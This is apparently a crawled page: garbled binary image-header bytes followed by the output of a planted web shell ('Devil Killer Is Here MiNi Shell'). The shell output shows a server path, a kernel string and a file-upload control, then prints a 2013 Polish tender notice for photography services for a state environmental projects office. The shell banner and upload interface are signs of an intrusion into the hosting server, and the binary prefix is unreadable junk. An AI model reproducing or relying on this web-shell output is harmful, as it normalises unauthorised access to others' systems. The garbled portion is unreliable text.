JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130516/191578-N-2013.html

<p class="kh_header"><b>Warszawa: Wykonanie łącznie 210 zdjęć wraz z ich postprodukcją w ramach 21 sesji zdjęciowych na potrzeby działalności informacyjno - promocyjnej trzech projektów JRP</b><br>
<b>Numer ogłoszenia: 191578 - 2013; data zamieszczenia: 16.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Koordynacji Projektów Środowiskowych , ul. Stawki 2, piętro 20, 00-193 Warszawa, woj. mazowieckie, tel. 22 318 70 82, faks 22 318 70 98.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ckps.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie łącznie 210 zdjęć wraz z ich postprodukcją w ramach 21 sesji zdjęciowych na potrzeby działalności informacyjno - promocyjnej trzech projektów JRP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie łącznie 210 zdjęć wraz z ich postprodukcją w ramach 21 sesji zdjęciowych na potrzeby działalności informacyjno-promocyjnej trzech projektów JRP finansowanych przez Unię Europejską ze środków Funduszu Spójności w ramach programu Operacyjnego Infrastruktura i Środowisko. 
2. Przedmiot zamówienia został podzielony na 3 części:
a) Część 1 - projekty realizowane w ramach III Priorytetu PO IiŚ (retencja nizinna), 70 zdjęć
b) Część 2 - projekty realizowane w ramach III Priorytetu PO IiŚ (retencja górska), 70 zdjęć
c) Część 3 - projekty realizowane w ramach II Priorytetu PO IiŚ (projekt poligonowy), 70 zdjęć
3. Szczegółowy opis przedmiotu zamówienia zawierający dokładne lokalizacje wykonywania sesji zdjęciowych w poszczególnych częściach został określony w Załączniku nr 1 do SIWZ. 
4. Warunki realizacji poszczególnych sesji zdjęciowych, terminy przekazywania zdjęć zostały określone w Szczegółowym opisie przedmiotu zamówienia, który stanowi Załącznik nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.96.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w następujących wysokościach: 
Część nr 1 - 250 zł (słownie: dwieście pięćdziesiąt złotych i 00/100 gr);
Część nr 2 - 300 zł (słownie: trzysta złotych i 00/100 gr);
Część nr 3 - 300 zł (słownie: trzysta złotych i 00/100 gr);
2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
2. 1 pieniądzu (przelewem na rachunek bankowy: w Banku Ochrony Środowiska S.A. nr 97154011572115668084150012 z dopiskiem WADIUM - Nr zamówienia: JRP/2710/033-3/13 zdjęcia JRP
2. 2 poręczeniach bankowych;
2. 3 poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
2. 4 gwarancjach bankowych;
2. 5 gwarancjach ubezpieczeniowych;
2. 6 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
3. Wadium wnoszone w postaci poręczeń i gwarancji bankowych, poręczeń kasy oszczędnościowo - kredytowej lub gwarancji ubezpieczeniowej należy załączyć do oferty w formie kopii dokumentu, a oryginał złożyć w oddzielnej kopercie oznaczonej oryginał wadium, która będzie załączona do oferty (wewnątrz opakowania oferty) i musi ono obejmować cały okres związania ofertą.
4. W treści dokumentu musi znajdować się nieodwołalne i bezwarunkowe zobowiązanie wypłaty na rzecz Zamawiającego kwoty wadium we wszystkich przypadkach powodujących utratę wadium przez Wykonawcę, określonych w art. 46 ust. 4a i 5 ustawy. Wadium  musi  obejmować cały okres związania ofertą. Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w ppkt. 2.1 rachunek bankowy najpóźniej przed upływem terminu składania ofert.
5. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 46 ust. 1-4 ustawy.
6. Zgodnie z art. 46 ust. 4a i 5 ustawy Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku gdy:
6.1 Wykonawca, którego oferta zostanie wybrana:
6.1.1 odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
6.1.2 nie wniesie wymaganego zabezpieczenia należytego wykonania umowy
6.1.3 zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe 
z przyczyn leżących po stronie Wykonawcy;
6.2 Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku: Wykonawca zobowiązany jest wykazać się w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
w części nr 1 - Wykonawca zobowiązany jest wykazać się w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonaniem co najmniej 1 usługi, która obejmowała zrealizowanie sesji zdjęciowych polegających na wykonaniu zdjęć reportażowych wraz z ich postprodukcją. w części nr 2 - Wykonawca zobowiązany jest wykazać się w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonaniem co najmniej 1 usługi, która obejmowała zrealizowanie sesji zdjęciowych polegających na wykonaniu zdjęć reportażowych wraz z ich postprodukcją. w części nr 3 - Wykonawca zobowiązany jest wykazać się w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonaniem co najmniej 1 usługi, która obejmowała zrealizowanie sesji zdjęciowych polegających na wykonaniu zdjęć reportażowych wraz z ich postprodukcją. UWAGA: W przypadku, gdy Wykonawca składa ofertę na więcej niż jedną część zamówienia, wykazuje się wykonaniem odpowiednio co najmniej 2 usług  (w przypadku składania oferty na 2 części zamówienia) lub 3 usług (w przypadku składania oferty na 3 części zamówienia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów (niezależnie od charakteru prawnego łączących go  z nimi stosunków), zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 2. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 3. Zasady udziału w postępowaniu Wykonawców występujących wspólnie o udzielenie zamówienia: 3.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty w oryginale. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być potwierdzone za zgodność z oryginałem przez notariusza.3.2. Oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana i oznaczona w taki sposób by prawnie zobowiązywała wszystkie podmioty. 3.3. Oświadczenie o braku podstaw do wykluczenia składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia oddzielnie, natomiast Wykaz usług wykonawcy mogą złożyć wspólnie. 3.4.Oświadczenie o spełnianiu warunków z art. 22 ust. 1 ustawy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą złożyć łącznie (na jednym druku) - w przypadku łącznego spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, albo każdy z Wykonawców odrębnie, w przypadku jeżeli taki Wykonawca spełnia samodzielnie wszystkie warunki udziału w postępowaniu. 3.5. listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że nie należy do grupy kapitałowej składa oddzielnie każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający, mając na uwadze art. 144 ustawy Pzp, dopuszcza zmianę postanowień niniejszej umowy w postaci uzasadnionego wydłużenia terminu realizacji usługi lub zmiany lokalizacji na równoważną, w szczególności: - w przypadku nieobecności osób oddelegowanych do kontaktu roboczego w danej lokalizacji. Dopuszcza się wydłużenie terminu o czas nieobecności osób uprawnionych do udziału w sesji potwierdzone pisemnie pod rygorem nieważności; - w przypadku uzasadnionego braku możliwości podjęcia decyzji w zakresie wyboru zdjęć przez Zamawiającego  w związku z nieobecnością osób decydujących o ich wyborze w terminie o którym mowa w § 3 ust. 10. - w przypadku klęski żywiołowej, nieoczekiwanych, niezależnych od Wykonawcy okoliczności uniemożliwiających przeprowadzenie sesji zdjęciowej na terenie danej lokalizacji - w przypadku zagrożenia zdrowia i życia Wykonawcy w lokalizacji danej sesji zdjęciowej.
2. Do okoliczności, które nie stanowią zmiany umowy i mogą być wprowadzone po wzajemnym poinformowaniu stron umowy należą: -  zmiana danych kontaktowych i adresowych Wykonawcy lub Zamawiającego, -  zmiana osób oddelegowanych do kontaktów roboczych z Wykonawcą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/ckps_warszawa/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Koordynacji Projektów Środowiskowych, ul. Stawki 2, piętro 20, 00-193 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2013 godzina 10:45, miejsce: Centrum Koordynacji Projektów Środowiskowych, ul. Stawki 2, piętro 20, 00-193 Warszawa - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu współfinansowanego przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> projekty realizowane w ramach III Priorytetu PO IiŚ (retencja nizinna).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest wykonanie i przeniesienie majątkowych praw autorskich do 70 zdjęć wraz z ich postprodukcją, wykonanych w 7 lokalizacjach skazanych w załączniku nr 1 do SIWZ - Szczegółowy opis przedmiotu zamówienia; 2. Sesje zdjęciowe mają na celu prezentację rezultatów projektów realizowanych w ramach II, III Priorytetu Programu Operacyjnego Infrastruktura i Środowisko. 3. Zamawiający wybierze 10 najlepszych fotografii z każdej sesji, w pełnym kolorze, z puli co najmniej 100 zdjęć dla każdej sesji. 
Wybrane przez Zamawiającego zdjęcia trafią do postprodukcji wykonywanej przez fotografa. 4. Wszystkie wybrane  fotografie będą poddane postprodukcji i zostaną dostarczone do siedziby Zamawiającego na płycie CD, zapisane  w rozdzielczości 300 dpi, formacie A3, w plikach o rozszerzeniu JPG. Każda część zamówienia dostarczana jest na jednej płycie, w której zdjęcia są pogrupowane w katalogach opatrzonych nazwą instytucji. 5. Zamawiający zakupi wybrane i poddane obróbce graficznej zdjęcia w ramach umowy zakładającej przeniesienie majątkowych praw autorskich na instytucję Zamawiającą. WARUNKI REALIZACJI ZAMÓWIENIA 6. Wykonawca ustala termin realizacji konkretnych sesji, w ramach terminu, o którym mowa w pkt. 3, w uzgodnieniu z przedstawicielem danej instytucji. 7. Wykonawca odpowiada za uzyskania wymaganych prawem zgód w celu wykonania zamówienia, zebranie od uczestników sesji zdjęciowej podpisanych formularzy zgody na wykorzystywanie wizerunku przez CKPŚ (w przypadku gdy fotografowany jest zespół/pracownik danej instytucji).
8. Koszty transportu na miejsce sesji, przemieszczanie się w danej lokalizacji, noclegu, wyżywienia oraz kontaktu z partnerami realizującymi projekty 
w danych lokalizacjach ponosi Wykonawca.
9. Wykonawca po wykonaniu danej sesji przesyła pulę 100 zdjęć z każdej sesji do wyboru w ciągu 4 dni roboczych od daty zakończenia danej sesji zdjęciowej.
10. Zamawiający zobowiązany jest do przekazania Wykonawcy informacji o wyborze zdjęć z każdej sesji do postprodukcji w terminie 2 dni roboczych od momentu ich otrzymania. 11. Wykonawca przysyła drogą pocztową, na płycie CD/DVD, zdjęcia  o odpowiednich parametrach i formatach, poddane post produkcji, w ciągu 10  dni roboczych od dnia dokonania wyboru przez Zamawiającego. Każda część zamówienia dostarczana jest na jednej płycie, 
w której zdjęcia są pogrupowane w katalogach opatrzonych nazwą instytucji/ beneficjenta z zastrzeżeniem obowiązku dotrzymania terminu do 15 lipca 2013 r.
12. Płyta i okładka płyty CD/DVD powinna zawierać następujące oznaczenia i informacje: a) Wpisany numer i nazwa części zamówienia; b) Wykaz nazw instytucji realizujących działanie będące przedmiotem sesji zdjęciowej w danej części zamówienia c) ciąg logotypów: PO IiŚ,  CKPŚ, UE/ FS d) Informację o współfinansowaniu:  Sesje zdjęciowe zostały współfinansowane przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko. e) Hasło: Dla rozwoju infrastruktury i środowiska..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.96.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> projekty realizowane w ramach III Priorytetu PO IiŚ (retencja górska).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest wykonanie i przeniesienie majątkowych praw autorskich do 70 zdjęć wraz z ich postprodukcją, wykonanych w 7 lokalizacjach skazanych w załączniku nr 1 do SIWZ - Szczegółowy opis przedmiotu zamówienia; 2. Sesje zdjęciowe mają na celu prezentację rezultatów projektów realizowanych w ramach II, III Priorytetu Programu Operacyjnego Infrastruktura i Środowisko. 3. Zamawiający wybierze 10 najlepszych fotografii z każdej sesji, w pełnym kolorze, z puli co najmniej 100 zdjęć dla każdej sesji. Wybrane przez Zamawiającego zdjęcia trafią do postprodukcji wykonywanej przez fotografa. 4. Wszystkie wybrane  fotografie będą poddane postprodukcji i zostaną dostarczone do siedziby Zamawiającego na płycie CD, zapisane  w rozdzielczości 300 dpi, formacie A3, w plikach o rozszerzeniu JPG. Każda część zamówienia dostarczana jest na jednej płycie, w której zdjęcia są pogrupowane w katalogach opatrzonych nazwą instytucji. 5. Zamawiający zakupi wybrane i poddane obróbce graficznej zdjęcia w ramach umowy zakładającej przeniesienie majątkowych praw autorskich na instytucję Zamawiającą. WARUNKI REALIZACJI ZAMÓWIENIA 6. Wykonawca ustala termin realizacji konkretnych sesji, w ramach terminu, o którym mowa w pkt. 3, w uzgodnieniu z przedstawicielem danej instytucji. 7. Wykonawca odpowiada za uzyskania wymaganych prawem zgód w celu wykonania zamówienia, zebranie od uczestników sesji zdjęciowej podpisanych formularzy zgody na wykorzystywanie wizerunku przez CKPŚ (w przypadku gdy fotografowany jest zespół/pracownik danej instytucji). 8. Koszty transportu na miejsce sesji, przemieszczanie się w danej lokalizacji, noclegu, wyżywienia oraz kontaktu z partnerami realizującymi projekty w danych lokalizacjach ponosi Wykonawca.
9. Wykonawca po wykonaniu danej sesji przesyła pulę 100 zdjęć z każdej sesji do wyboru w ciągu 4 dni roboczych od daty zakończenia danej sesji zdjęciowej.
10. Zamawiający zobowiązany jest do przekazania Wykonawcy informacji o wyborze zdjęć z każdej sesji do postprodukcji w terminie 2 dni roboczych od momentu ich otrzymania. 11. Wykonawca przysyła drogą pocztową, na płycie CD/DVD, zdjęcia  o odpowiednich parametrach i formatach, poddane post produkcji, w ciągu 10  dni roboczych od dnia dokonania wyboru przez Zamawiającego. Każda część zamówienia dostarczana jest na jednej płycie, w której zdjęcia są pogrupowane w katalogach opatrzonych nazwą instytucji/ beneficjenta z zastrzeżeniem obowiązku dotrzymania terminu do 15 lipca 2013 r.
12. Płyta i okładka płyty CD/DVD powinna zawierać następujące oznaczenia i informacje: a) Wpisany numer i nazwa części zamówienia; b) Wykaz nazw instytucji realizujących działanie będące przedmiotem sesji zdjęciowej w danej części zamówienia c) ciąg logotypów: PO IiŚ,  CKPŚ, UE/ FS d) Informację o współfinansowaniu:  Sesje zdjęciowe zostały współfinansowane przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko. e) Hasło: Dla rozwoju infrastruktury i środowiska..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.96.00.00-1.</p></li>
